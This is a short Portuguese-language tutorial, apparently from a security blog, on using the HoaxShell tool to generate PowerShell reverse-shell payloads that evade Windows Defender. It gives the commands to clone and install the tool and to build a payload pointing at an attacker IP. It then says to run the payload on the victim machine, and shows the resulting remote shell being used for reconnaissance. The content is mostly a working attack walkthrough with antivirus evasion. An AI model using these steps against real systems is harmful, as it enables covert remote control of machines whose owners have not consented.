HoaxShell é uma ferramenta desenvolvida em Python que gera payloads capaz de realizar o bypass no Windows Defender e em outros Antivírus conhecidos.
Realize o clone do projeto hoaxshell e liste o conteúdo do diretório.
Linuxgit clone https://github.com/t3l3machus/hoaxshell cd hoaxshell/ ls -l

Realize a instalação das dependências :
Linuxpip3 install -r requirements.txt

Para gerar o payload basta executar o script seguido do IP do Atacante :
Linuxpython3 hoaxshell.py -s 192.168.0.53

Copie o payload gerado em PowerShell :

Certifique-se que o Windows Defender esteja com todas as proteções habilitadas :

Execute o payload na máquina da Vítima.

Observe que a conexão reversa é estabelecida com sucesso!
LinuxPS C:\Users\100security>

Digite os comandos :
Linuxhostname ipconfig

Para confirmar se o Windows Defender está habilitado digite :
PowerShellGet-MpComputerStatus | Select-Object -Property Antivirusenabled,AMServiceEnabled,AntispywareEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled,NISEnabled,OnAccessProtectionEnabled,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated
